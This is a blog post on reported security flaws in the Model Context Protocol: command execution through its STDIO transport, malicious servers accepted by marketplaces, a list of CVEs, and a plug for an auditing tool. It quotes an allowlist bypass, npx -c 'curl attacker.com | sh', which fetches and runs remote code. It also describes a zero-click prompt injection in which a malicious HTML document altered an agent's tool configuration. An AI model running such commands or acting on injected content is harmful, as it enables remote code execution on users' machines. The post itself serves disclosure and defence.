OX Security proved STDIO transport is RCE by design. 9 of 11 MCP marketplaces accepted a malicious server without detection. Anthropic called it "expected behavior." This is the npm supply chain crisis, replaying at the agent layer — and marketplace review gates can't stop it.
On April 15, 2026, OX Security published research under the title "The Mother of All AI Supply Chains." The finding: Anthropic's Model Context Protocol — the de facto standard for connecting AI agents to external tools — has a fundamental architectural vulnerability in every official SDK, across all ten supported languages.
The vulnerability class is not a bug. It is how MCP was designed to work.
MCP's STDIO transport accepts arbitrary command strings and passes them to subprocess execution without validation, sanitization, or sandboxing. The critical detail: commands execute before MCP handshake validation occurs. Pass a malicious command to the transport layer, receive an error — and the command has already run.
This affects the Python SDK (73 million downloads, 32,000+ repositories), the TypeScript SDK, and every other official implementation. 150 million cumulative downloads. An estimated 200,000 vulnerable instances.
Anthropic's response: "This is an explicit part of how stdio MCP servers work and we believe that this design does represent a secure default."
They declined to modify the protocol.
The Four Attack Classes
1. Unauthenticated command injection via STDIO transport
MCP's STDIO transport calls subprocess.Popen() (Python) or child_process.spawn() (Node) with developer-supplied command strings. No command allowlist, no manifest, no signing.
2. Hardening bypass via argument injection
Flowise's input filtering was bypassed using npx -c "curl attacker.com | sh". The allowlist permits npx; the -c flag turns it into arbitrary code execution.
3. Zero-click prompt injection
In Windsurf (CVE-2026-30615, CVSS 8.0), processing a malicious HTML document triggered unauthorized MCP configuration changes with no user interaction.
4. Marketplace poisoning
OX uploaded a PoC malicious MCP server to 11 major marketplaces. 9 of 11 accepted it without detection.
Why This Can't Be Patched
OX proposed four fixes. All declined:
- Manifest-only execution replacing arbitrary command strings
- Command allowlisting blocking high-risk binaries
- Mandatory dangerous-mode opt-in flag
- Marketplace verification with signed security manifests
The CVE casualty list:
| CVE | Product | CVSS | What Happened |
|---|---|---|---|
| CVE-2026-33032 | nginx-ui | 9.8 | MCPwn — 2 HTTP requests, zero auth, full takeover. Actively exploited. |
| CVE-2026-5058 | aws-mcp-server | 9.8 | Pre-auth RCE via OS command injection |
| CVE-2026-5059 | aws-mcp-server | 9.8 | Second injection point |
| CVE-2026-32211 | @azure-devops/mcp | 9.1 | Zero auth — exposes repos, pipelines, API keys |
| CVE-2026-30615 | Windsurf | 8.0 | True zero-click prompt injection |
The npm Parallel
MCP marketplaces are at step 3 of the supply chain crisis playbook:
- Ecosystem grows faster than trust infrastructure
- Registry becomes primary distribution channel
- Attackers discover review gates are insufficient ← we are here
- Attacks scale to distribution channel size
- Community responds with more review gates that fail the same way
The same trajectory that took npm a decade is compressing into months.
The Missing Signal
Declarations can be faked. A marketplace listing says "verified." 9 of 11 accepted a malicious server.
Behavior is harder to fake. When behavioral commitment scoring was applied retrospectively to npm attacks, structural signals were present before every incident. event-stream's injected dependency scored 13/100. ua-parser-js had single-maintainer concentration risk before compromise.
What To Do Now
# Audit your MCP servers
npx proof-of-commitment mcp-remote @modelcontextprotocol/server-github
# Scan a specific package
npx proof-of-commitment npm express
Web UI: getcommit.dev/audit
The MCP ecosystem is moving at infrastructure speed. The security model hasn't kept up. The response cannot be "better review gates" — that failed for npm, PyPI, and 9 of 11 MCP marketplaces.
Sources: OX Security (April 15, 2026), The Register (April 16). CVEs as of April 20, 2026.
Top comments (0)